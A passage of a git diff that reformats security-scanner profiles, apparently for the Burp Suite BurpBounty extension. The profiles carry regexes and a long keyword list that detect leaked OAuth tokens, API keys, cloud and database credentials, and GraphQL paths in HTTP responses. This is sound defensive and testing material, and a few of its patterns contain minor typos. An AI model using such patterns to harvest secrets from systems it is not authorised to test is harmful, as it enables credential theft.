"CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Google Cloud Platform OAuth 2.0", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Google_Drive_OAuth.bb b/profiles/Google_Drive_OAuth.bb old mode 100644 new mode 100755 index 5077b25..fd390a7 --- a/profiles/Google_Drive_OAuth.bb +++ b/profiles/Google_Drive_OAuth.bb @@ -1 +1,59 @@ -[{"Name":"Google_Drive_OAuth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Drive OAuth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Google_Drive_OAuth", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Google Drive OAuth", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Google_Oauth.bb b/profiles/Google_Oauth.bb old mode 100644 new mode 100755 index 05f9bf3..314dce4 --- a/profiles/Google_Oauth.bb +++ b/profiles/Google_Oauth.bb @@ -1 +1,60 @@ -[{"Name":"Google_Oauth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^(ya29\\.[0-9A-Za-z\\-_]+)","true,Or,[^a-zA-Z0-9](ya29\\.[0-9A-Za-z\\-_]+)"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Google Oauth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Google_Oauth", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,^(ya29\\.[0-9A-Za-z\\-_]+)", + "true,Or,[^a-zA-Z0-9](ya29\\.[0-9A-Za-z\\-_]+)" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Google Oauth", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/GraphqlPath.bb b/profiles/GraphqlPath.bb index 5467d30..e268d31 100755 --- a/profiles/GraphqlPath.bb +++ b/profiles/GraphqlPath.bb @@ -1 +1,83 @@ -[{"Name":"GraphqlPath","Enabled":true,"Scanner":3,"Author":"@Sy3Omda","UrlEncode":false,"Grep":["true,Or,All Request,Name,/graphql","true,Or,All Request,Name,/graphql/console","true,Or,All Request,Name,/graphql.php","true,Or,All Request,Name,/graphiql","true,Or,All Request,Name,/graphiql.php","true,Or,All Request,Name,/explorer","true,Or,All Request,Name,/altair","true,Or,All Request,Name,/playground","true,Or,All Request,Name,/v1/graphql","true,Or,All Request,Name,/v1/graphql/console","true,Or,All Request,Name,/v1/graphql.php","true,Or,All Request,Name,/v1/graphiql","true,Or,All Request,Name,/v1/graphiql.php","true,Or,All Request,Name,/v1/explorer","true,Or,All Request,Name,/v1/alt4ir","true,Or,All Request,Name,/v1/playground","true,Or,All Request,Name,/v2/graphql","true,Or,All Request,Name,/v2/graphql/console","true,Or,All Request,Name,/v2/graphql.php","true,Or,All Request,Name,/v2/graphiql","true,Or,All Request,Name,/v2/graphiql.php","true,Or,All Request,Name,/v2/explorer","true,Or,All Request,Name,/v2/altair","true,Or,All Request,Name,/v2/playground"],"Tags":["Graphql","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"NegativeCT":false,"IsResponseCode":false,"NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Graphql Path Found","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Graphql Path Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "GraphqlPath", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@Sy3Omda", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Name,/graphql", + "true,Or,All Request,Name,/graphql/console", + "true,Or,All Request,Name,/graphql.php", + "true,Or,All Request,Name,/graphiql", + "true,Or,All Request,Name,/graphiql.php", + "true,Or,All Request,Name,/explorer", + "true,Or,All Request,Name,/altair", + "true,Or,All Request,Name,/playground", + "true,Or,All Request,Name,/v1/graphql", + "true,Or,All Request,Name,/v1/graphql/console", + "true,Or,All Request,Name,/v1/graphql.php", + "true,Or,All Request,Name,/v1/graphiql", + "true,Or,All Request,Name,/v1/graphiql.php", + "true,Or,All Request,Name,/v1/explorer", + "true,Or,All Request,Name,/v1/alt4ir", + "true,Or,All Request,Name,/v1/playground", + "true,Or,All Request,Name,/v2/graphql", + "true,Or,All Request,Name,/v2/graphql/console", + "true,Or,All Request,Name,/v2/graphql.php", + "true,Or,All Request,Name,/v2/graphiql", + "true,Or,All Request,Name,/v2/graphiql.php", + "true,Or,All Request,Name,/v2/explorer", + "true,Or,All Request,Name,/v2/altair", + "true,Or,All Request,Name,/v2/playground" + ], + "Tags": [ + "Graphql", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Graphql Path Found", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Graphql Path Found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Heroku_OAuth_2.0.bb b/profiles/Heroku_OAuth_2.0.bb old mode 100644 new mode 100755 index 3cd4e19..10cdc27 --- a/profiles/Heroku_OAuth_2.0.bb +++ b/profiles/Heroku_OAuth_2.0.bb @@ -1 +1,60 @@ -[{"Name":"Heroku_OAuth_2.0","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^(0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,[^a-zA-Z0-9](0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Heroku OAuth 2.0","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Heroku_OAuth_2.0", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,^(0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})", + "true,Or,[^a-zA-Z0-9](0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Heroku OAuth 2.0", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/HockeyApp_Key.bb b/profiles/HockeyApp_Key.bb old mode 100644 new mode 100755 index 897824d..e1a7331 --- a/profiles/HockeyApp_Key.bb +++ b/profiles/HockeyApp_Key.bb @@ -1 +1,59 @@ -[{"Name":"HockeyApp_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)hockey.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{32}(\\\\\\\"|\u0027|`)?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"HockeyApp Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "HockeyApp_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)hockey.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{32}(\\\\\\\"|\u0027|`)?" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "HockeyApp Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Interesting_Keyworks.bb b/profiles/Interesting_Keyworks.bb old mode 100644 new mode 100755 index be812ea..7035d4e --- a/profiles/Interesting_Keyworks.bb +++ b/profiles/Interesting_Keyworks.bb @@ -1 +1,707 @@ -[{"Name":"Interesting_Keyworks","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,adzerk[_-]api[_-]key","true,Or,algolia[_-]admin[_-]key[_-]1","true,Or,algolia[_-]admin[_-]key[_-]2","true,Or,algolia[_-]admin[_-]key[_-]mcm","true,Or,algolia[_-]api[_-]key","true,Or,algolia[_-]api[_-]key[_-]mcm","true,Or,algolia[_-]api[_-]key[_-]search","true,Or,algolia[_-]search[_-]api[_-]key","true,Or,algolia[_-]search[_-]key","true,Or,algolia[_-]search[_-]key[_-]1","true,Or,alicloud[_-]access[_-]key","true,Or,alicloud[_-]secret[_-]key","true,Or,amazon[_-]bucket[_-]name","true,Or,amazon[_-]secret[_-]access[_-]key","true,Or,anaconda[_-]token","true,Or,android[_-]docs[_-]deploy[_-]token","true,Or,ansible[_-]vault[_-]password","true,Or,apiary[_-]api[_-]key","true,Or,apigw[_-]access[_-]token","true,Or,app[_-]bucket[_-]perm","true,Or,app[_-]report[_-]token[_-]key","true,Or,apple[_-]id[_-]password","true,Or,argos[_-]token","true,Or,artifactory[_-]key","true,Or,artifacts[_-]aws[_-]access[_-]key[_-]id","true,Or,artifacts[_-]aws[_-]secret[_-]access[_-]key","true,Or,artifacts[_-]bucket","true,Or,artifacts[_-]key","true,Or,artifacts[_-]secret","true,Or,assistant[_-]iam[_-]apikey","true,Or,auth0[_-]api[_-]clientsecret","true,Or,auth0[_-]client[_-]secret","true,Or,author[_-]email[_-]addr","true,Or,author[_-]npm[_-]api[_-]key","true,Or,aws[_-]access[_-]key","true,Or,aws[_-]access[_-]key[_-]id","true,Or,aws[_-]config[_-]accesskeyid","true,Or,aws[_-]config[_-]secretaccesskey","true,Or,aws[_-]secret[_-]access[_-]key","true,Or,aws[_-]secret[_-]key","true,Or,aws[_-]ses[_-]access[_-]key[_-]id","true,Or,aws[_-]ses[_-]secret[_-]access[_-]key","true,Or,awscn[_-]access[_-]key[_-]id","true,Or,awscn[_-]secret[_-]access[_-]key","true,Or,b2[_-]app[_-]key","true,Or,b2[_-]bucket","true,Or,bintray[_-]api[_-]key","true,Or,bintray[_-]apikey","true,Or,bintray[_-]gpg[_-]password","true,Or,bintray[_-]key","true,Or,bintray[_-]token","true,Or,bluemix[_-]api[_-]key","true,Or,bluemix[_-]auth","true,Or,bluemix[_-]pass","true,Or,bluemix[_-]pass[_-]prod","true,Or,bluemix[_-]password","true,Or,bluemix[_-]pwd","true,Or,bluemix[_-]username","true,Or,brackets[_-]repo[_-]oauth[_-]token","true,Or,browser[_-]stack[_-]access[_-]key","true,Or,browserstack[_-]access[_-]key","true,Or,bucketeer[_-]aws[_-]access[_-]key[_-]id","true,Or,bucketeer[_-]aws[_-]secret[_-]access[_-]key","true,Or,built[_-]branch[_-]deploy[_-]key","true,Or,bundlesize[_-]github[_-]token","true,Or,bx[_-]password","true,Or,bx[_-]username","true,Or,cache[_-]s3[_-]secret[_-]key","true,Or,cargo[_-]token","true,Or,cattle[_-]access[_-]key","true,Or,cattle[_-]agent[_-]instance[_-]auth","true,Or,cattle[_-]secret[_-]key","true,Or,censys[_-]secret","true,Or,certificate[_-]password","true,Or,cf[_-]password","true,Or,cheverny[_-]token","true,Or,chrome[_-]client[_-]secret","true,Or,chrome[_-]refresh[_-]token","true,Or,ci[_-]deploy[_-]password","true,Or,ci[_-]project[_-]url","true,Or,ci[_-]registry[_-]user","true,Or,ci[_-]server[_-]name","true,Or,ci[_-]user[_-]token","true,Or,claimr[_-]database","true,Or,claimr[_-]db","true,Or,claimr[_-]superuser","true,Or,claimr[_-]token","true,Or,cli[_-]e2e[_-]cma[_-]token","true,Or,client[_-]secret","true,Or,clojars[_-]password","true,Or,cloud[_-]api[_-]key","true,Or,cloudant[_-]archived[_-]database","true,Or,cloudant[_-]audited[_-]database","true,Or,cloudant[_-]database","true,Or,cloudant[_-]instance","true,Or,cloudant[_-]order[_-]database","true,Or,cloudant[_-]parsed[_-]database","true,Or,cloudant[_-]password","true,Or,cloudant[_-]processed[_-]database","true,Or,cloudant[_-]service[_-]database","true,Or,cloudflare[_-]api[_-]key","true,Or,cloudflare[_-]auth[_-]email","true,Or,cloudflare[_-]auth[_-]key","true,Or,cloudflare[_-]email","true,Or,cloudinary[_-]url","true,Or,cloudinary[_-]url[_-]staging","true,Or,clu[_-]repo[_-]url","true,Or,clu[_-]ssh[_-]private[_-]key[_-]base64","true,Or,cn[_-]access[_-]key[_-]id","true,Or,cn[_-]secret[_-]access[_-]key","true,Or,cocoapods[_-]trunk[_-]email","true,Or,cocoapods[_-]trunk[_-]token","true,Or,codacy[_-]project[_-]token","true,Or,codeclimate[_-]repo[_-]token","true,Or,codecov[_-]token","true,Or,coding[_-]token","true,Or,conekta[_-]apikey","true,Or,contentful[_-]access[_-]token","true,Or,contentful[_-]cma[_-]test[_-]token","true,Or,contentful[_-]integration[_-]management[_-]token","true,Or,contentful[_-]management[_-]api[_-]access[_-]token","true,Or,contentful[_-]management[_-]api[_-]access[_-]token[_-]new","true,Or,contentful[_-]php[_-]management[_-]test[_-]token","true,Or,contentful[_-]test[_-]org[_-]cma[_-]token","true,Or,contentful[_-]v2[_-]access[_-]token","true,Or,conversation[_-]password","true,Or,conversation[_-]username","true,Or,cos[_-]secrets","true,Or,coveralls[_-]api[_-]token","true,Or,coveralls[_-]repo[_-]token","true,Or,coveralls[_-]token","true,Or,coverity[_-]scan[_-]token","true,Or,cypress[_-]record[_-]key","true,Or,danger[_-]github[_-]api[_-]token","true,Or,database[_-]host","true,Or,database[_-]name","true,Or,database[_-]password","true,Or,database[_-]port","true,Or,database[_-]user","true,Or,database[_-]username","true,Or,datadog[_-]api[_-]key","true,Or,datadog[_-]app[_-]key","true,Or,db[_-]connection","true,Or,db[_-]database","true,Or,db[_-]host","true,Or,db[_-]password","true,Or,db[_-]pw","true,Or,db[_-]user","true,Or,db[_-]username","true,Or,ddg[_-]test[_-]email","true,Or,ddg[_-]test[_-]email[_-]pw","true,Or,ddgc[_-]github[_-]token","true,Or,deploy[_-]password","true,Or,deploy[_-]secure","true,Or,deploy[_-]token","true,Or,deploy[_-]user","true,Or,dgpg[_-]passphrase","true,Or,digitalocean[_-]access[_-]token","true,Or,digitalocean[_-]ssh[_-]key[_-]body","true,Or,digitalocean[_-]ssh[_-]key[_-]ids","true,Or,docker[_-]hub[_-]password","true,Or,docker[_-]key","true,Or,docker[_-]pass","true,Or,docker[_-]passwd","true,Or,docker[_-]password","true,Or,docker[_-]postgres[_-]url","true,Or,docker[_-]token","true,Or,dockerhub[_-]password","true,Or,dockerhubpassword","true,Or,doordash[_-]auth[_-]token","true,Or,dropbox[_-]oauth[_-]bearer","true,Or,droplet[_-]travis[_-]password","true,Or,dsonar[_-]login","true,Or,dsonar[_-]projectkey","true,Or,elastic[_-]cloud[_-]auth","true,Or,elasticsearch[_-]password","true,Or,encryption[_-]password","true,Or,end[_-]user[_-]password","true,Or,env[_-]github[_-]oauth[_-]token","true,Or,env[_-]heroku[_-]api[_-]key","true,Or,env[_-]key","true,Or,env[_-]secret","true,Or,env[_-]secret[_-]access[_-]key","true,Or,env[_-]sonatype[_-]password","true,Or,eureka[_-]awssecretkey","true,Or,exp[_-]password","true,Or,file[_-]password","true,Or,firebase[_-]api[_-]json","true,Or,firebase[_-]api[_-]token","true,Or,firebase[_-]key","true,Or,firebase[_-]project[_-]develop","true,Or,firebase[_-]token","true,Or,firefox[_-]secret","true,Or,flask[_-]secret[_-]key","true,Or,flickr[_-]api[_-]key","true,Or,flickr[_-]api[_-]secret","true,Or,fossa[_-]api[_-]key","true,Or,ftp[_-]host","true,Or,ftp[_-]login","true,Or,ftp[_-]password","true,Or,ftp[_-]pw","true,Or,ftp[_-]user","true,Or,ftp[_-]username","true,Or,gcloud[_-]bucket","true,Or,gcloud[_-]project","true,Or,gcloud[_-]service[_-]key","true,Or,gcr[_-]password","true,Or,gcs[_-]bucket","true,Or,gh[_-]api[_-]key","true,Or,gh[_-]email","true,Or,gh[_-]next[_-]oauth[_-]client[_-]secret","true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]id","true,Or,gh[_-]next[_-]unstable[_-]oauth[_-]client[_-]secret","true,Or,gh[_-]oauth[_-]client[_-]secret","true,Or,gh[_-]oauth[_-]token","true,Or,gh[_-]repo[_-]token","true,Or,gh[_-]token","true,Or,gh[_-]unstable[_-]oauth[_-]client[_-]secret","true,Or,ghb[_-]token","true,Or,ghost[_-]api[_-]key","true,Or,git[_-]author[_-]email","true,Or,git[_-]author[_-]name","true,Or,git[_-]committer[_-]email","true,Or,git[_-]committer[_-]name","true,Or,git[_-]email","true,Or,git[_-]name","true,Or,git[_-]token","true,Or,github[_-]access[_-]token","true,Or,github[_-]api[_-]key","true,Or,github[_-]api[_-]token","true,Or,github[_-]auth","true,Or,github[_-]auth[_-]token","true,Or,github[_-]client[_-]secret","true,Or,github[_-]deploy[_-]hb[_-]doc[_-]pass","true,Or,github[_-]deployment[_-]token","true,Or,github[_-]hunter[_-]token","true,Or,github[_-]hunter[_-]username","true,Or,github[_-]oauth","true,Or,github[_-]oauth[_-]token","true,Or,github[_-]password","true,Or,github[_-]pwd","true,Or,github[_-]release[_-]token","true,Or,github[_-]repo","true,Or,github[_-]token","true,Or,github[_-]tokens","true,Or,gitlab[_-]user[_-]email","true,Or,gogs[_-]password","true,Or,google[_-]account[_-]type","true,Or,google[_-]client[_-]email","true,Or,google[_-]client[_-]id","true,Or,google[_-]client[_-]secret","true,Or,google[_-]maps[_-]api[_-]key","true,Or,google[_-]private[_-]key","true,Or,gpg[_-]key[_-]name","true,Or,gpg[_-]keyname","true,Or,gpg[_-]ownertrust","true,Or,gpg[_-]passphrase","true,Or,gpg[_-]private[_-]key","true,Or,gpg[_-]secret[_-]keys","true,Or,gradle[_-]publish[_-]key","true,Or,gradle[_-]publish[_-]secret","true,Or,gradle[_-]signing[_-]key[_-]id","true,Or,gradle[_-]signing[_-]password","true,Or,gren[_-]github[_-]token","true,Or,grgit[_-]user","true,Or,hab[_-]auth[_-]token","true,Or,hab[_-]key","true,Or,hb[_-]codesign[_-]gpg[_-]pass","true,Or,hb[_-]codesign[_-]key[_-]pass","true,Or,heroku[_-]api[_-]key","true,Or,heroku[_-]email","true,Or,heroku[_-]token","true,Or,hockeyapp[_-]token","true,Or,homebrew[_-]github[_-]api[_-]token","true,Or,hub[_-]dxia2[_-]password","true,Or,ij[_-]repo[_-]password","true,Or,ij[_-]repo[_-]username","true,Or,index[_-]name","true,Or,integration[_-]test[_-]api[_-]key","true,Or,integration[_-]test[_-]appid","true,Or,internal[_-]secrets","true,Or,ios[_-]docs[_-]deploy[_-]token","true,Or,itest[_-]gh[_-]token","true,Or,jdbc[_-]databaseurl","true,Or,jdbc[_-]host","true,Or,jwt[_-]secret","true,Or,kafka[_-]admin[_-]url","true,Or,kafka[_-]instance[_-]name","true,Or,kafka[_-]rest[_-]url","true,Or,keystore[_-]pass","true,Or,kovan[_-]private[_-]key","true,Or,kubecfg[_-]s3[_-]path","true,Or,kxoltsn3vogdop92m","true,Or,leanplum[_-]key","true,Or,lektor[_-]deploy[_-]password","true,Or,lektor[_-]deploy[_-]username","true,Or,lighthouse[_-]api[_-]key","true,Or,linkedin[_-]client[_-]secretor lottie[_-]s3[_-]api[_-]key","true,Or,linux[_-]signing[_-]key","true,Or,ll[_-]publish[_-]url","true,Or,ll[_-]shared[_-]key","true,Or,looker[_-]test[_-]runner[_-]client[_-]secret","true,Or,lottie[_-]happo[_-]api[_-]key","true,Or,lottie[_-]happo[_-]secret[_-]key","true,Or,lottie[_-]s3[_-]secret[_-]key","true,Or,lottie[_-]upload[_-]cert[_-]key[_-]password","true,Or,lottie[_-]upload[_-]cert[_-]key[_-]store[_-]password","true,Or,magento[_-]auth[_-]password","true,Or,magento[_-]auth[_-]username ","true,Or,magento[_-]password","true,Or,mail[_-]password","true,Or,mailchimp[_-]api[_-]key","true,Or,mailchimp[_-]key","true,Or,mailer[_-]password","true,Or,mailgun[_-]api[_-]key","true,Or,mailgun[_-]apikey","true,Or,mailgun[_-]password","true,Or,mailgun[_-]priv[_-]key","true,Or,mailgun[_-]pub[_-]apikey","true,Or,mailgun[_-]pub[_-]key","true,Or,mailgun[_-]secret[_-]api[_-]key","true,Or,manage[_-]key","true,Or,manage[_-]secret","true,Or,management[_-]token","true,Or,managementapiaccesstoken","true,Or,mandrill[_-]api[_-]key","true,Or,manifest[_-]app[_-]token","true,Or,manifest[_-]app[_-]url","true,Or,mapbox[_-]access[_-]token","true,Or,mapbox[_-]api[_-]token","true,Or,mapbox[_-]aws[_-]access[_-]key[_-]id","true,Or,mapbox[_-]aws[_-]secret[_-]access[_-]key","true,Or,mapboxaccesstoken","true,Or,mg[_-]api[_-]key","true,Or,mg[_-]public[_-]api[_-]key","true,Or,mh[_-]apikey","true,Or,mh[_-]password","true,Or,mile[_-]zero[_-]key","true,Or,minio[_-]access[_-]key","true,Or,minio[_-]secret[_-]key","true,Or,multi[_-]bob[_-]sid","true,Or,multi[_-]connec